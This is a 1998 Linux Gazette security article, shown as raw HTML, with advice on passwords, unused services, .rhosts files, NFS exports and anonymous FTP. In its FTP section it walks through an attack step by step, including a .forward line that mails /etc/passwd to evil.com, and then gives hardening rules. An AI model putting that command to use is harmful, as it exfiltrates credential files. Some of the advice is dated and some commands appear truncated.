208 lines
9.9 KiB
HTML
208 lines
9.9 KiB
HTML
<!--startcut ==========================================================-->
|
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
|
|
<HTML>
|
|
<HEAD>
|
|
<title>Securing Your Linux Box LG #34</title>
|
|
</HEAD>
|
|
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#A000A0"
|
|
ALINK="#FF0000">
|
|
<!--endcut ============================================================-->
|
|
|
|
<H4>
|
|
"Linux Gazette...<I>making Linux just a little more fun!</I>"
|
|
</H4>
|
|
|
|
<P> <HR> <P>
|
|
<!--===================================================================-->
|
|
|
|
<center>
|
|
<h1><font color="maroon">Securing Your Linux Box</font></h1>
|
|
<H4>By <a href="mailto:pvertes@bigfoot.com">Peter Vertes</a></H4>
|
|
</center>
|
|
<P> <HR> <P>
|
|
|
|
With Linux becoming widespread in the work environment, the security of
|
|
the individual machines must be considered. Machines running Linux can be
|
|
networked easily, creating the potential risk of unauthorized users
|
|
gaining access. This is particularly true if your Linux installation is
|
|
straight out of the box. I will give a brief introduction to securing your
|
|
Linux box and making your network environment a safer place for both your
|
|
data and the people who use use it.
|
|
<p>
|
|
``You are only as strong as the weakest link in your
|
|
defense,'' says the Chinese proverb, and this is certainly true in
|
|
the field of computer security.
|
|
If you forget to patch that newly downloaded version of
|
|
<b>lpd</b> all your walls can come crumbling down, even with the securest
|
|
system in the world.
|
|
Always be cautious when installing any new software. If you are using Linux only
|
|
as a desktop machine at home and you connect to the Internet via a modem,
|
|
you do not have to worry so much. On the other hand,
|
|
if you are running a mission-critical server wired into the Net, I would
|
|
strongly advise checking out the security history of any
|
|
piece of software that you wish to install (remembering <i>that</i>
|
|
famous version of Sendmail).
|
|
<p>
|
|
Several mailing lists and many web pages offer extensive help on Linux security.
|
|
The information is out there, you just need to go and
|
|
harvest it. If you don't have the time, patience or know-how, contact
|
|
a security consultant to take a look at your system setup and discover any
|
|
potential weak spots. Usually security consultant firms have their own
|
|
<i>Tiger Teams</i> who for a fee will attempt to make the walls crumble
|
|
around your computer(s). Their object is to get into your system under a
|
|
certain period of time and some even refund your money if they are
|
|
unsuccessful. Tiger Teams are a valuable asset to security-conscious
|
|
companies. Since Tiger Teams cost quite a bit, I would
|
|
suggest you break into your own machines. This exercise can save you money,
|
|
and give you a better understanding of the structure and different abstract
|
|
layers of Linux in the process.
|
|
<p>
|
|
The starting point of our Linux security tour is the password. Many
|
|
people keep their entire life on a computer and the only
|
|
thing preventing others from seeing it is the eight-character string called
|
|
a password. Not something one would call completely reliable.
|
|
Contrary to popular belief, an uncrackable password does not exist.
|
|
Given time and resources all passwords can be guessed either by social
|
|
engineering or by brute force.
|
|
<p>
|
|
Since password cracking can be a time- and resource-consuming art, make it
|
|
hard for any cracker who has grabbed your
|
|
password file. Running a password cracker on
|
|
a weekly basis on your system is a good idea. This helps to find and
|
|
replace passwords that are easily guessed or weak. Also, a password
|
|
checking mechanism should be present to reject a weak password when first
|
|
choosing a password or changing an old one. Character strings that are plain
|
|
dictionary words, or are all in the same case, or do not contain numbers
|
|
or special characters should not be accepted as a new password.
|
|
<p>
|
|
A safe password can be constructed by taking the first letter of your favorite
|
|
phrase, quote or sentence and adding special characters. For example, suppose
|
|
my favorite phrase is, ``the quick brown fox jumped over the lazy
|
|
dog,'' by taking the first letter of every word, I'd end up with
|
|
<b>tqbfjotld</b>. Next, I'd add special characters and perhaps
|
|
squeeze in the year resulting in a password of <b>9tqbf!jotld8</b>.
|
|
This is a much secure than the name of your spouse or child.
|
|
<p>
|
|
Word lists containing hundreds (if not thousands) of words that could be fed
|
|
to a password cracker are available
|
|
on the Internet. Some contain only names, so cracking the
|
|
password ``maggie'' is quite trivial while the likelihood
|
|
of <b>9tqbf!jotld8</b> appearing in one of those lists is quite slim.
|
|
However, even though if our proposed password is not likely to appear in a
|
|
word list, more advanced cracker programs come with a feature called
|
|
<i>Incremental Cracking Mode</i> which means that every possible
|
|
permutation is tried. The user gives it the minimum and maximum number of letters in a password, upper case or
|
|
lower case, inclusion of special characters and numbers, and the passwords
|
|
cracker does the rest. Granted, it could take a lot of time and resources,
|
|
but it is possible.
|
|
<p>
|
|
Next, be aware of the services running on your system.
|
|
Most distributions of Linux have HTTP, FTP, SMB, Sendmail and various other
|
|
services running as default. Not everyone needs a web server running so
|
|
why not get rid of it--it takes up resources and can be a potential
|
|
security risk. To terminate web services, type:
|
|
<pre>
|
|
kill -9
|
|
</pre>
|
|
To find out the process ID(s) of a certain daemon or service, type:
|
|
<pre>
|
|
ps aux | grep
|
|
</pre>
|
|
Also, comment these daemons out of your start-up scripts so that they
|
|
will not restart after a reboot.
|
|
Unused services can let others gain information about your system and they
|
|
could also pose as a security risk.
|
|
<p>
|
|
Another thing to avoid is the use of .rhosts files, as they are a favorite
|
|
of crackers. The .rhosts files contain names of systems on which you have an
|
|
account. When you use TELNET to log in to a system, the system checks its
|
|
.rhosts file and if your machine name is found, it gives you access without
|
|
the need for a password.
|
|
<p>
|
|
For more information about the .rhosts file, look in your favorite Linux or
|
|
System Administration manual. One of
|
|
the most famous exploits involving the .rhosts file is the misconfiguration
|
|
of the <i>Network File System</i> (NFS). First the hacker checks for any
|
|
exported file systems on your machines (to check, type:
|
|
<tt>showmount -e</tt>), and if any are world
|
|
writable. Next he remotely mounts your file system and places an .rhosts
|
|
file into a user's directory. Last, the hacker uses TELNET
|
|
to log into your machine as the that user, and your
|
|
system is now compromised. The moral of this story: leave the
|
|
configuration of the <b>nfsd</b> to someone who is more experienced than you
|
|
or read the documentation carefully.
|
|
<p>
|
|
Another similar hack involves the misconfiguration of a
|
|
popular service commonly found on the Internet; anonymous FTP. The first, and
|
|
obvious method, of gaining unauthorized access via anonymous FTP is by letting
|
|
the public have access to your password file. Granted all passwords
|
|
are stored in encrypted form, but remember we've already shown
|
|
crackers can get by this. Another way to gain access to the local password
|
|
file is by exploiting the writeability of the /ftp directory. Look at these simple steps:
|
|
<p>
|
|
<ol>
|
|
<li> Create a fake .forward file that has the following command in
|
|
it:
|
|
</ol>
|
|
<pre>
|
|
|/bin/mail evildude@evil.com < /etc/passwd
|
|
</pre>
|
|
<ol>
|
|
<li> Connect to the victim machine via FTP and log in as user
|
|
FTP.
|
|
<li> Enter any password you wish.
|
|
<li> Upload the .forward file you have created in Step 1.
|
|
<li> Log out and send mail to ftp@victim.machine.com.
|
|
<li> Sit back as victim.machine.com e-mails you a copy of its
|
|
local password file.
|
|
</ol>
|
|
Clearly, an easy way to get a password file. The heart of
|
|
this hack lies in a simple mistake made by the system administrator; so,
|
|
<i>never</i> make the /ftp directory writable by user
|
|
<i>anonymous</i>. Setting up an anonymous FTP server
|
|
is an art of its own, but it will help to remember these simple rules:
|
|
<p>
|
|
<ul>
|
|
<li> <i>Only</i> the /incoming directory should be made
|
|
writable and <i>only</i> by root and user FTP.
|
|
<li> Anonymous FTP users should have <i>only</i> executable (and
|
|
read) access to the /pub and the /incoming directory.
|
|
<li> FTP users should <i>NOT</i> be able to write to
|
|
/ftp. If you enable write access, the above mentioned hack
|
|
can (and presumably will) be made. For more information
|
|
on how to correctly set up an anonymous FTP service, check out the man
|
|
page for <b>ftpaccess</b> or the CERT advisory titled 93:10 (found at
|
|
http://www.cert.org/).
|
|
</ul>
|
|
One last thing to remember is that the system logs are your friends.
|
|
The logs are the only way to find out what is/has/will be happening on your
|
|
system, so keep reading them. Also, make sure that they are not
|
|
being tampered with by intruders or by fellow system administrators.
|
|
<p>
|
|
As Linux finds its way into more and more corporate environments, it is a
|
|
crucial step to keep users out of each other's files and patch all
|
|
the holes that might be utilized by hackers. With the notion of
|
|
interconnectivity, industrial espionage will
|
|
also be on the rise. With simple preventative measures and user
|
|
education, the workplace can be a safe place for your secrets.
|
|
|
|
<!--===================================================================-->
|
|
<P> <hr> <P>
|
|
<center><H5>Copyright © 1998, Peter Vertes <BR>
|
|
Published in Issue 34 of <i>Linux Gazette</i>, November 1998</H5></center>
|
|
|
|
<!--===================================================================-->
|
|
<P> <hr> <P>
|
|
<A HREF="./index.html"><IMG ALIGN=BOTTOM SRC="../gx/indexnew.gif"
|
|
ALT="[ TABLE OF CONTENTS ]"></A>
|
|
<A HREF="../index.html"><IMG ALIGN=BOTTOM SRC="../gx/homenew.gif"
|
|
ALT="[ FRONT PAGE ]"></A>
|
|
<A HREF="./ayers3.html"><IMG SRC="../gx/back2.gif"
|
|
ALT=" Back "></A>
|
|
<A HREF="./lisse.html"><IMG SRC="../gx/fwd.gif" ALT=" Next "></A>
|
|
<P> <hr> <P>
|
|
<!--startcut ==========================================================-->
|
|
</BODY>
|
|
</HTML>
|
|
<!--endcut ============================================================-->
|